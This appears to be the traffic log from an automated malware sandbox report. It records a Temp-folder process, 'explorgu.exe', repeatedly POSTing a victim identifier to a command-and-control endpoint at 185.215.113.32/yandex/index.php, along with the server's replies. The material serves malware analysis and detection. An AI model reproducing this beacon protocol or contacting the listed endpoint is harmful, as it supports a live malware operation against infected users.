                                                                                            Data Raw: 32 32 32 0d 0a 20 2b 2b 2b 5f 31 5f 62 66 38 34 33 39 31 62 39 62 39 30 62 31 39 35 34 61 34 34 65 61 38 61 34 38 33 61 33 35 31 66 33 64 65 39 34 31 61 63 64 64 64 63 66 65 62 66 65 33 65 30 63 37 32 37 38 30 35 37 34 30 65 39 34 30 66 65 34 36 34 61 35 36 35 64 38 63 63 35 66 33 30 39 2d 31 2d 5f 32 5f 65 64 39 66 33 39 32 38 39 37 62 39 62 33 64 65 30 62 34 31 66 66 62 63 33 66 36 39 34 66 34 30 37 64 64 62 30 33 61 61 38 61 38 31 66 65 65 65 64 34 65 34 39 63 32 61 63 30 31 31 31 38 62 62 30 61 63 31 31 63 36 37 31 66 30 30 39 62 38 62 65 32 34 64 2d 32 2d 5f 33 5f 62 31 39 33 36 62 35 62 64 32 38 33 61 65 39 62 35 62 30 35 61 65 38 63 31 61 33 37 36 38 34 34 33 38 66 61 30 30 61 66 63 62 64 62 66 37 62 39 66 63 61 65 64 62 37 31 39 39 34 30 31 39 62 33 35 32 66 63 31 66 34 61 31 38 30 31 39 30 63 61 65 38 34 61 65 35 2d 33 2d 5f 34 5f 39 39 62 35 35 62 31 66 66 33 61 62 38 35 38 32 34 63 32 32 66 38 39 36 34 66 32 34 34 36 31 64 30 32 61 38 35 32 61 33 65 66 66 36 62 37 64 39 63 36 65 31 66 66 35 35 63 37 36 35 31 61 61 36 34 37 63 37 2d 34 2d 5f 35 5f 65 39 64 66 35 39 35 39 65 32 61 38 62 30 39 64 35 34 31 62 66 36 39 66 32 37 30 32 36 36 31 39 32 66 64 62 36 62 63 38 38 62 65 32 38 30 66 32 66 61 65 64 66 39 35 64 38 30 35 33 36 37 38 34 37 65 63 39 37 61 37 35 34 65 37 37 62 61 64 33 63 32 30 31 61 30 62 63 65 36 30 37 31 64 65 62 34 62 37 35 65 34 31 66 38 33 64 31 35 65 65 30 37 64 61 65 32 36 38 34 36 64 65 65 37 32 31 31 31 61 38 66 37 63 34 31 31 30 62 39 61 66 37 37 38 66 33 62 39 30 66 65 65 64 32 37 65 61 39 62 37 34 33 62 39 31 30 65 62 33 36 61 61 38 30 64 38 39 64 31 32 35 32 35 61 35 63 32 63 39 2d 35 2d 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 222 +++_1_bf84391b9b90b1954a44ea8a483a351f3de941acdddcfebfe3e0c727805740e940fe464a565d8cc5f309-1-_2_ed9f392897b9b3de0b41ffbc3f694f407ddb03aa8a81feeed4e49c2ac01118bb0ac11c671f009b8be24d-2-_3_b1936b5bd283ae9b5b05ae8c1a37684438fa00afcbdbf7b9fcaedb71994019b352fc1f4a180190cae84ae5-3-_4_99b55b1ff3ab85824c22f8964f24461d02a852a3eff6b7d9c6e1ff55c7651aa647c7-4-_5_e9df5959e2a8b09d541bf69f270266192fdb6bc88be280f2faedf95d805367847ec97a754e77bad3c201a0bce6071deb4b75e41f83d15ee07dae26846dee72111a8f7c4110b9af778f3b90feed27ea9b743b910eb36aa80d89d12525a5c2c9-5-0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            10192.168.2.449746185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:08.247528076 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:08.494174004 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:08 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:08.495125055 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:08.744987011 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:08 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            11192.168.2.449747185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:09.106960058 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:09.353672981 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:09 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:09.357744932 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:09.619718075 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:09 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            12192.168.2.449748185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:09.973146915 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:10.210881948 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:10 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:10.216556072 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:10.458705902 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:10 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            13192.168.2.449749185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:10.808789968 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:11.046200037 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:10 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:11.047044039 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:11.289104939 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:11 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            14192.168.2.449750185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:11.638694048 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:11.885088921 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:11 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:11.885776997 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:12.136790037 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:12 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            15192.168.2.449751185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:12.497524977 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:12.744534016 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:12 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:12.818743944 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:13.068973064 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:12 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            16192.168.2.449752185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:13.411513090 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:13.648804903 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:13 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:13.649682999 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:13.891869068 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:13 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            17192.168.2.449753185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:14.239878893 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:14.478408098 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:14 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:14.479264975 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:14.726540089 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:14 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            18192.168.2.449754185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:15.079363108 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:15.326309919 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:15 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:15.327097893 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:15.576745033 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:15 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            19192.168.2.449755185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:15.935143948 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:16.181408882 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:16 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:16.182435989 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:16.434144974 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:16 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
